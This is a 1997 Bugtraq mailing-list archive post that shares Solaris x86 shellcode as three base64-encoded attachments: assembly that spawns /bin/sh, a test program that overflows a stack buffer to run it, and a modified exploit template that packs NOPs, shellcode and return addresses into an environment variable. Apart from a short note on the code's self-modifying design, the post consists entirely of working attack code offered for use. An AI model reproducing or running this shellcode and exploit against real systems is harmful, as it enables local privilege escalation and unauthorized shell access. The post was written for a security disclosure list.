Bugtraq mailing list archives

Solaris x86 buffer overflows

From: jfb11 () MICRO-NET COM (jim bresler)
Date: Thu, 12 Jun 1997 08:49:26 -0400


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

---559023410-851401618-866119766=:15567
Content-Type: TEXT/PLAIN; charset=US-ASCII

        Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday.
This includes the code I assembled(it will core dump when ran diretly,
because it is self-modifying), a test program that should spawn a shell,
and a modified version of Aleph One's exploit3.c

        Note that most buffer overflows are self-modifying in one part,
this changes itself in two parts.  Because a long call is used and
registers cannot be used as arguments, the arguments to the lcall should
be ignored.  To avoid the need to leave a null charector in at run time,
the arguments are changed at run-time.

        Jim <jfb11 () micro-net com>

---559023410-851401618-866119766=:15567
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="solarisx86_shellcode.s"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.3.95.970612084926.15567B () candy micro-net com>
Content-Description:

LmZpbGUJInNvbGFyaXN4ODZfc2hlbGxjb2RlLnMiDQoudmVyc2lvbgkiMDEu
MDEiDQouZ2xvYmwgbWFpbg0KCS50eXBlCSBtYWluLEBmdW5jdGlvbg0KbWFp
bjoNCglwdXNobCAlZWJwDQoJbW92bCAlZXNwLCVlYnANCglzdWJsICQ4LCVl
c3ANCglqbXAgLm9mZnNldDINCi5leGVjdmU6DQoJeG9ybCAlZWF4LCVlYXgN
Cgltb3ZiICQweDNiLCVhbA0KCWptcCAuZG9fbGNhbGwNCglyZXQNCi5leGl0
Og0KCXhvcmwgJWVheCwlZWF4DQoJaW5jICVlYXgNCglqbXAgLmRvX2xjYWxs
DQoJcmV0DQoNCi5sY2FsbF9vZmYxOg0KCXBvcGwgJWVzaQ0KCXhvcmwgJWVi
eCwlZWJ4DQoJbW92bCAlZWJ4LDEoJWVzaSkgDQoJbW92YiAkMHgwNyw1KCVl
c2kpDQoJbW92YiAlYmgsNiglZXNpKQ0KCWptcCAubGNhbGxfaW5zDQouZG9f
bGNhbGw6DQoJY2FsbCAubGNhbGxfb2ZmMQ0KLmxjYWxsX2luczoNCglsY2Fs
bCAkMHgwZjBmLCQweGZmZmZmZmZmDQoJcmV0DQoNCi5vZmZzZXQxOg0KCXBv
cGwgJWVzaQ0KCXhvcmwgJWVheCwlZWF4CQ0KCW1vdmwgJWVzaSwweDgoJWVz
aSkNCgltb3ZiICVhbCwweDcoJWVzaSkNCgltb3ZsICVlYXgsMHhjKCVlc2kp
DQoJcHVzaGwgJWVheA0KCWxlYWwgMHg4KCVlc2kpLCVlYXgNCglwdXNobCAl
ZWF4DQoJbW92bCAweDgoJWVzaSksJWVheA0KCXB1c2hsICVlYXgNCgljYWxs
IC5leGVjdmUNCglhZGRsICQxMiwlZXNwDQoJcHVzaGwgJDB4MQ0KCWNhbGwg
LmV4aXQNCglhZGRsICQ0LCVlc3ANCg0KLm9mZnNldDI6DQoJY2FsbCAub2Zm
c2V0MQ0KCS5zdHJpbmcJIi9iaW4vc2giDQo=
---559023410-851401618-866119766=:15567
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="test_sc.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.3.95.970612084926.15567C () candy micro-net com>
Content-Description:

Y2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhlY1x4
MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJIlx4
MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVlXHgw
MVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1XHhl
OFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZmXHgw
Zlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZceDA3
XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJceDQ2
XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRceDBj
XHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4ZThc
eGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KY2hhciBsYXJnZV9z
dHJpbmdbMjU2XTsNCg0Kdm9pZCBtYWluKHZvaWQpDQp7DQogY2hhciBidWZm
ZXJbMTkyXTsNCiBpbnQgaTsNCiBsb25nICpsb25nX3B0ciA9IChsb25nICop
IGxhcmdlX3N0cmluZzsNCg0KIGZvciAoaSA9IDA7IGkgPCA2NDsgaSsrKQ0K
ICAgKihsb25nX3B0ciArIGkpID0gKGludCkgYnVmZmVyOw0KDQogZm9yIChp
ID0gMDsgaSA8IHN0cmxlbihzaGVsbGNvZGUpOyBpKyspDQogICBsYXJnZV9z
dHJpbmdbaV0gPSBzaGVsbGNvZGVbaV07DQoNCiBzdHJjcHkoYnVmZmVyLCBs
YXJnZV9zdHJpbmcpOyANCn0NCg==
---559023410-851401618-866119766=:15567
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="exploit3.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.3.95.970612084926.15567D () candy micro-net com>
Content-Description:

I2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VU
ICAgICAgICAgICAgICAgICAgICAgMA0KI2RlZmluZSBERUZBVUxUX0JVRkZF
Ul9TSVpFICAgICAgICAgICAgICA1MTINCiNkZWZpbmUgTk9QCQkJCTB4OTAN
Cg0KY2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhl
Y1x4MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJ
Ilx4MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVl
XHgwMVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1
XHhlOFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZm
XHgwZlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZc
eDA3XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJc
eDQ2XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRc
eDBjXHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4
ZThceGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KdW5zaWduZWQg
bG9uZyBnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAlZXNwLCVl
YXgiKTsNCn0NCg0Kdm9pZCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10p
IHsNCiAgY2hhciAqYnVmZiwgKnB0cjsNCiAgbG9uZyAqYWRkcl9wdHIsIGFk
ZHI7DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQsIGJzaXplPURFRkFV
TFRfQlVGRkVSX1NJWkU7DQogIGludCBpOw0KDQogIGlmIChhcmdjID4gMSkg
YnNpemUgID0gYXRvaShhcmd2WzFdKTsNCiAgaWYgKGFyZ2MgPiAyKSBvZmZz
ZXQgPSBhdG9pKGFyZ3ZbMl0pOw0KDQogIGlmICghKGJ1ZmYgPSBtYWxsb2Mo
YnNpemUpKSkgew0KICAgIHByaW50ZigiQ2FuJ3QgYWxsb2NhdGUgbWVtb3J5
LlxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KDQogIGFkZHIgPSBnZXRfc3Ao
KSAtIG9mZnNldDsNCiAgcHJpbnRmKCJVc2luZyBhZGRyZXNzOiAweCV4XG4i
LCBhZGRyKTsNCg0KICBwdHIgPSBidWZmOw0KICBhZGRyX3B0ciA9IChsb25n
ICopIHB0cjsNCiAgZm9yIChpID0gMDsgaSA8IGJzaXplOyBpKz00KQ0KICAg
ICooYWRkcl9wdHIrKykgPSBhZGRyOw0KDQogIGZvciAoaSA9IDA7IGkgPCBi
c2l6ZS8yOyBpKyspDQogICAgYnVmZltpXSA9IE5PUDsNCg0KICBwdHIgPSBi
dWZmICsgKChic2l6ZS8yKSAtIChzdHJsZW4oc2hlbGxjb2RlKS8yKSk7DQog
IGZvciAoaSA9IDA7IGkgPCBzdHJsZW4oc2hlbGxjb2RlKTsgaSsrKQ0KICAg
ICoocHRyKyspID0gc2hlbGxjb2RlW2ldOw0KDQogIGJ1ZmZbYnNpemUgLSAx
XSA9ICdcMCc7DQoNCiAgbWVtY3B5KGJ1ZmYsIkVHRz0iLDQpOw0KICBwdXRl
bnYoYnVmZik7DQogIHN5c3RlbSgiL3Vzci9sb2NhbC9iaW4vYmFzaCIpOw0K
fQ0K
---559023410-851401618-866119766=:15567--

Current thread:

wu-ftpd 2.4.2-beta-13 default UMASK hole Roy M. Hooper (Jun 11)
- wu-ftpd 2.4.2-beta-13 default UMASK hole Steve VanDevender (Jun 11)
- Re: wu-ftpd 2.4.2-beta-13 default UMASK hole George Staikos (Jun 11)
- Denial of service (qmail-smtpd) Frank DENIS -Jedi/Sector One- (Jun 11)
- qmail-dos-2.c, another denial of service attack Frank DENIS -Jedi/Sector One- (Jun 11)
- DNS abuse Jordi Murgo (Jun 11)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
  - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
    - Netscape Exploit root (Jun 14)
    - Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
    - Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
    - sendmail 8.8.6 released Eric Allman (Jun 14)
    - Re: Netscape Exploit Roger Espel Llima (Jun 14)

(Thread continues...)